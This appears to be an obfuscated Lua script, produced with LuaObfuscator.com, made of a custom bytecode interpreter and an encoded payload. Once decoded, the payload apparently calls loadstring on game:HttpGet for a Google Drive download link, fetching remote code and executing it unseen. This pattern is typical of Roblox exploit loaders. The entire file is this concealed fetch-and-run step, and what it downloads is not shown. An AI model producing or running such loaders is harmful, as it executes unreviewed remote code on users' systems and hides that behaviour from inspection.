--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v82=0;while true do if (v82==0) then v19=v0(v3(v30,1,1));return "";end end else local v83=0;local v84;while true do if (v83==0) then v84=v2(v0(v30,16));if v19 then local v99=v5(v84,v19);v19=nil;return v99;else return v84;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v85=0 -(0 + 0) ;local v86;while true do if (v85==0) then v86=(v31/((5 -(1068 -(68 + 997)))^(v32-(1 -0))))%((4 -2)^(((v33-((1890 -(226 + 1044)) -(555 + 64))) -(v32-(932 -((1221 -364) + 74)))) + (569 -(367 + 201)))) ;return v86-(v86%(928 -(214 + 713))) ;end end else local v87=(1 + 1)^(v32-(1 + 0)) ;return (((v31%(v87 + v87))>=v87) and (878 -(282 + (2590 -1995)))) or (1637 -(1523 + 114)) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (119 -(32 + 85)) );v18=v18 + 2 + 0 ;return (v36 * (57 + 199)) + v35 ;end local function v23() local v37=0;local v38;local v39;local v40;local v41;while true do if ((957 -(892 + 65))==v37) then v38,v39,v40,v41=v1(v16,v18,v18 + (7 -4) );v18=v18 + (6 -(4 -2)) ;v37=1 -0 ;end if (v37==(351 -(64 + 23 + 263))) then return (v41 * ((66681547 -49904151) -(67 + 113))) + (v40 * (48056 + 17480)) + (v39 * 256) + v38 ;end end end local function v24() local v42=v23();local v43=v23();local v44=953 -(802 + 150) ;local v45=(v20(v43,1 + 0 ,53 -33 ) * ((3 -1)^(57 -25))) + v42 ;local v46=v20(v43,16 + 5 ,(1466 -(145 + 293)) -((1345 -(44 + 386)) + 82) );local v47=((v20(v43,90 -58 )==(1 + 0)) and  -(1 -0)) or (1188 -(1069 + 118)) ;if (v46==0) then if (v45==(1486 -(998 + 488))) then return v47 * (0 -0) ;else local v92=0 -0 ;while true do if (v92==(0 + 0)) then v46=1 -(0 + 0) ;v44=0 + 0 ;break;end end end elseif (v46==(2838 -(368 + 423))) then return ((v45==(0 -(0 + 0))) and (v47 * (1/(18 -(10 + 8))))) or (v47 * NaN) ;end return v8(v47,v46-(3934 -2911) ) * (v44 + (v45/((444 -(416 + 26))^(165 -113)))) ;end local function v25(v48) local v49;if  not v48 then local v88=0 -0 ;while true do if (v88==((1631 -(814 + 45)) -(201 + 571))) then v48=v23();if (v48==0) then return "";end break;end end end v49=v3(v16,v18,(v18 + v48) -(3 -2) );v18=v18 + v48 ;local v50={};for v65=1139 -(116 + 1022) , #v49 do v50[v65]=v2(v1(v3(v49,v65,v65)));end return v6(v50);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v51=(function() return 0 -0 ;end)();local v52=(function() return;end)();local v53=(function() return;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();while true do local v67=(function() return 0 + 0 ;end)();while true do if (v67~=(2 -1)) then else if (v51~=(814 -(569 + 242))) then else for v100= #"!",v23() do local v101=(function() return v21();end)();if (v20(v101, #",", #"~")==(0 -0)) then local v113=(function() return 0 + 0 ;end)();local v114=(function() return;end)();local v115=(function() return;end)();local v116=(function() return;end)();local v117=(function() return;end)();while true do if (v113==(1025 -(706 + 318))) then local v150=(function() return 1251 -(721 + 530) ;end)();local v151=(function() return;end)();while true do if (v150==(1271 -(945 + 326))) then v151=(function() return 0;end)();while true do if (v151==(3 -2)) then v113=(function() return 869 -(550 + 317) ;end)();break;end if (v151~=(700 -(271 + 429))) then else local v182=(function() return 0 -0 ;end)();while true do if (v182~=(0 -0)) then else v116=(function() return nil;end)();v117=(function() return nil;end)();v182=(function() return 1;end)();end if ((2 -1)==v182) then v151=(function() return 286 -(134 + 151) ;end)();break;end end end end break;end end end if (v113==(1665 -(970 + 695))) then v114=(function() return 0;end)();v115=(function() return nil;end)();v113=(function() return 1 -0 ;end)();end if (v113==(1290 -(993 + 295))) then while true do if (v114~=(1992 -(582 + 1408))) then else local v171=(function() return 0;end)();local v172=(function() return;end)();while true do if (v171~=(0 -0)) then else v172=(function() return 0;end)();while true do if (v172==(0 -0)) then if (v20(v116, #"}", #"~")== #".") then v117[1 + 1 ]=(function() return v58[v117[7 -5 ]];end)();end if (v20(v116,1826 -(1195 + 629) ,1 + 1 )~= #"~") then else v117[ #"asd"]=(function() return v58[v117[ #"xnx"]];end)();end v172=(function() return 1 -0 ;end)();end if (v172==1) then v114=(function() return  #"-19";end)();break;end end break;end end end if ( #"~"==v114) then local v173=(function() return 241 -(187 + 54) ;end)();local v174=(function() return;end)();while true do if (v173==(0 + 0)) then v174=(function() return 0 + 0 ;end)();while true do if ((529 -(406 + 123))~=v174) then else v117=(function() return {v22(),v22(),nil,nil};end)();if (v115==(0 + 0)) then local v185=(function() return 0;end)();while true do if ((0 + 0)~=v185) then else v117[ #"19("]=(function() return v22();end)();v117[ #"?id="]=(function() return v22();end)();break;end end elseif (v115== #">") then v117[ #"-19"]=(function() return v23();end)();elseif (v115==(3 -1)) then v117[ #"19("]=(function() return v23() -(2^(26 -10)) ;end)();elseif (v115~= #"19(") then else local v190=(function() return 0 + 0 ;end)();local v191=(function() return;end)();while true do if (0==v190) then v191=(function() return 0 + 0 ;end)();while true do if (v191==0) then v117[ #"-19"]=(function() return v23() -((1638 -(1373 + 263))^(1161 -(466 + 679))) ;end)();v117[ #"?id="]=(function() return v22();end)();break;end end break;end end end v174=(function() return 1;end)();end if (v174~=(1001 -(451 + 549))) then else v114=(function() return 2;end)();break;end end break;end end end if (v114~=(0 + 0)) then else local v175=(function() return 0 -0 ;end)();local v176=(function() return;end)();while true do if (v175==0) then v176=(function() return 0;end)();while true do if (v176~=0) then else v115=(function() return v20(v101,2 -0 , #"xnx");end)();v116=(function() return v20(v101, #"0836",2 + 4 );end)();v176=(function() return 1385 -(746 + 638) ;end)();end if (1~=v176) then else v114=(function() return  #"]";end)();break;end end break;end end end if (v114== #"xxx") then if (v20(v116, #"xnx", #"nil")~= #"}") then else v117[ #"?id="]=(function() return v58[v117[ #".com"]];end)();end v53[v100]=(function() return v117;end)();break;end end break;end end end end for v102= #"|",v23() do v54,v102,v28=(function() return v52(v54,v102,v28);end)();end return v56;end if (v51==(1 + 1)) then v58=(function() return {};end)();for v103= #",",v57 do local v104=(function() return 0 + 0 ;end)();local v105=(function() return;end)();local v106=(function() return;end)();local v107=(function() return;end)();while true do if (v104==(1 -0)) then v107=(function() return nil;end)();while true do if ((341 -(218 + 123))~=v105) then else local v152=(function() return 584 -(57 + 527) ;end)();while true do if (v152~=1) then else v105=(function() return 1;end)();break;end if (v152==0) then v106=(function() return v21();end)();v107=(function() return nil;end)();v152=(function() return 1582 -(1535 + 46) ;end)();end end end if (v105~=(1428 -(41 + 1386))) then else if (v106== #"|") then v107=(function() return v21()~=(0 + 0) ;end)();elseif (v106==(1 + 1)) then v107=(function() return v24();end)();elseif (v106~= #"xnx") then else v107=(function() return v25();end)();end v58[v103]=(function() return v107;end)();break;end end break;end if (v104~=(0 -0)) then else v105=(function() return 560 -(306 + 254) ;end)();v106=(function() return nil;end)();v104=(function() return 1;end)();end end end v56[ #"91("]=(function() return v21();end)();v51=(function() return 1 + 2 ;end)();end break;end if (v67==(166 -(122 + 44))) then if (v51==(1 -0)) then local v98=(function() return 0 -0 ;end)();while true do if (v98==0) then v55=(function() return {};end)();v56=(function() return {v53,v54,nil,v55};end)();v98=(function() return 1468 -(899 + 568) ;end)();end if (v98==(1 + 0)) then v57=(function() return v23();end)();v51=(function() return 4 -2 ;end)();break;end end end if (v51~=0) then else v52=(function() return function(v108,v109,v110) local v111=(function() return 0 -0 ;end)();local v112=(function() return;end)();while true do if (0==v111) then v112=(function() return 0;end)();while true do if (v112~=(603 -(268 + 335))) then else local v165=(function() return 65 -(30 + 35) ;end)();while true do if (v165==(290 -(60 + 230))) then v108[v109-#"[" ]=(function() return v110();end)();return v108,v109,v110;end end end end break;end end end;end)();v53=(function() return {};end)();v54=(function() return {};end)();v51=(function() return 1;end)();end v67=(function() return 573 -(426 + 146) ;end)();end end end end local function v29(v59,v60,v61) local v62=v59[1258 -(1043 + 214) ];local v63=v59[7 -5 ];local v64=v59[3];return function(...) local v68=v62;local v69=v63;local v70=v64;local v71=v27;local v72=1 -0 ;local v73= -((1020 -(483 + 200)) -(144 + (1655 -(1404 + 59))));local v74={};local v75={...};local v76=v12("#",...) -(2 -1) ;local v77={};local v78={};for v89=0 + (0 -0) ,v76 do if (v89>=v70) then v74[v89-v70 ]=v75[v89 + (581 -(361 + 219)) ];else v78[v89]=v75[v89 + (321 -(53 + 267)) ];end end local v79=(v76-v70) + 1 + 0 ;local v80;local v81;while true do v80=v68[v72];v81=v80[414 -(15 + 398) ];if (v81<=(989 -(18 + 964))) then if (v81<=(11 -8)) then if ((2782<3315) and (v81<=(1 + 0))) then if (v81==(0 + 0)) then local v118=850 -(20 + 830) ;local v119;while true do if (v118==(0 + (0 -0))) then v119=v80[5 -3 ];v78[v119]=v78[v119](v13(v78,v119 + (127 -(116 + 10)) ,v73));break;end end else local v120=v80[1 + 1 ];local v121=v78[v80[1664 -((2242 -(468 + 297)) + 184) ]];v78[v120 + (739 -(542 + 196)) ]=v121;v78[v120]=v121[v80[5 -1 ]];end elseif (v81==(3 -1)) then do return;end else local v125=856 -(564 + 292) ;local v126;while true do if ((((562 -(334 + 228)) + 0)==v125) or (876>=2964)) then v126=v80[2 + 0 ];v78[v126]=v78[v126](v13(v78,v126 + 1 + 0 ,v73));break;end end end elseif (v81<=(12 -7)) then if ((v81>(480 -(41 + 435))) or (2232>2497)) then local v127=1001 -(938 + 63) ;local v128;local v129;local v130;local v131;while true do if ((0 -0)==v127) then v128=v80[1553 -(1126 + 425) ];v129,v130=v71(v78[v128](v13(v78,v128 + (406 -(118 + (967 -680))) ,v80[11 -(18 -10) ])));v127=1614 -(1565 + 48) ;end if (v127==(1 + 0)) then v73=(v130 + v128) -(1122 -(118 + 1003)) ;v131=0 -0 ;v127=269 -(176 + 91) ;end if (v127==2) then for v166=v128,v73 do local v167=0 -0 ;while true do if (v167==(377 -(142 + 235))) then v131=v131 + (4 -3) ;v78[v166]=v129[v131];break;end end end break;end end else do return;end end elseif (v81>(2 + (6 -2))) then v78[v80[1877 -(45 + 112 + 1718) ]]={};else local v133=0 + 0 ;local v134;local v135;local v136;local v137;while true do if ((v133==1) or (2110<=332)) then v73=(v136 + v134) -(978 -(553 + 424)) ;v137=0 -0 ;v133=2 + 0 ;end if ((3686>3172) and (v133==(5 -3))) then for v168=v134,v73 do v137=v137 + (237 -(141 + 95)) + 0 ;v78[v168]=v135[v137];end break;end if (v133==(0 -0)) then v134=v80[2 + 0 + 0 ];v135,v136=v71(v78[v134](v13(v78,v134 + 1 + 0 ,v80[2 + 1 ])));v133=2 -1 ;end end end elseif (v81<=(7 + (9 -5))) then if ((v81<=(19 -10)) or (4474<820)) then if ((4279>=2882) and (v81>(22 -14))) then v78[v80[4 -2 ]]=v61[v80[6 -3 ]];else v78[v80[1 + 0 + 1 ]]();end elseif ((v81>(48 -38)) or (2029>=3521)) then v78[v80[6 -4 ]]={};else v78[v80[755 -((654 -415) + 514) ]]();end elseif (v81<=(5 + 8)) then if (v81==(1341 -(797 + 532))) then v78[v80[442 -(382 + 58) ]]=v80[3];else v78[v80[2 + 0 + 0 ]]=v61[v80[2 + 1 ]];end elseif (v81==(32 -18)) then local v145=1202 -(373 + 829) ;local v146;local v147;while true do if (v145==0) then v146=v80[5 -(2 + 1) ];v147=v78[v80[1208 -((1269 -367) + 303) ]];v145=1 -0 ;end if ((v145==(732 -(281 + 195 + 255))) or (2037>=4642)) then v78[v146 + (1131 -(369 + 761)) ]=v147;v78[v146]=v147[v80[3 + 1 ]];break;end end else v78[v80[2 -0 ]]=v80[1693 -(1121 + 569) ];end v72=v72 + (1 -0) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403503Q00682Q7470733A2Q2F64726976652E672Q6F676C652E636F6D2F75633F6578706F72743D646F776E6C6F61642669643D3130314E584A2Q6337792D624B2Q616743307348506D535F64704F687A394E7A7200094Q000B7Q001209000100013Q001209000200023Q00200100020002000300120F000400044Q0005000200046Q00013Q00022Q00080001000100012Q00043Q00017Q00",v9(),...);
